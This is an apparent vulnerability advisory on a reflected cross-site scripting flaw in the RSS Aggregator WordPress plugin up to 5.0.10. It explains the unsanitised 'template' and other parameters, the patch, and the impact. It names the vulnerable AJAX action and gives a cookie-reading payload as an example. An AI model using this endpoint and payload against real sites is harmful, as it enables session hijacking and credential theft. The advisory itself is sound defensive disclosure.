CVE-2026-1216: RSS Aggregator <= 5.0.10 – Reflected Cross-Site Scripting via 'template' Parameter (wp-rss-aggregator)

CVE ID CVE-2026-1216
Severity High (CVSS 7.2)
CWE 79
Vulnerable Version 5.0.10
Patched Version 5.0.11
Disclosed February 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1216:
This vulnerability is a reflected Cross-Site Scripting (XSS) flaw in the RSS Aggregator WordPress plugin affecting versions up to 5.0.10. The vulnerability exists in the plugin’s rendering functionality, specifically through insufficient sanitization of user-supplied shortcode attributes. The CVSS score of 7.2 indicates a high-severity issue that enables unauthenticated attackers to inject malicious scripts.

Atomic Edge research identified the root cause as inadequate input validation and output escaping for the ‘template’ parameter and other shortcode attributes. The vulnerable code path begins in wp-rss-aggregator/core/src/Renderer.php at line 198, where the render() method processes user-supplied arguments. The ‘template’ parameter (line 246) and other attributes like ‘align’, ‘limit’, ‘pagination’, ‘exclude’, ‘source’, ‘sources’, ‘feeds’, ‘category’, ‘folders’, ‘className’, and ‘page’ (lines 198-319) were passed directly without proper sanitization. These values flow through the rendering pipeline and are eventually output in HTML contexts without escaping.

Exploitation occurs via crafted links containing malicious JavaScript in the ‘template’ parameter or other shortcode attributes. Attackers can target the plugin’s AJAX endpoint at /wp-admin/admin-ajax.php with action=wpra.render.display. The payload is delivered through the ‘template’ parameter in the POST data, which gets reflected in the HTTP response without proper escaping. Example payloads include alert(document.cookie) or encoded variations that bypass basic filtering.

The patch addresses the vulnerability through multiple layers of defense. In wp-rss-aggregator/core/src/Renderer.php, the developer added sanitize_text_field() calls for all user-controlled parameters: ‘template’ (line 246), ‘align’, ‘limit’, ‘pagination’ (lines 198-200), ‘exclude’ (line 246), ‘source’, ‘sources’, ‘feeds’ (lines 262-264), ‘category’, ‘folders’ (line 310), and ‘page’ (line 319). For the ‘className’ parameter, they used sanitize_html_class() (line 319). The patch also introduces a nonce verification check in wp-rss-aggregator/core/modules/renderer.php (lines 55-61) to prevent CSRF attacks and adds output escaping in LayoutTrait.php for authorPrefix (line 134) and sourcePrefix (line 210).

Successful exploitation allows attackers to execute arbitrary JavaScript in the victim’s browser context. This enables session hijacking, credential theft, administrative actions through CSRF, and defacement of affected pages. Since the vulnerability requires no authentication, any WordPress site using the vulnerable plugin version is exposed to drive-by attacks through malicious links.
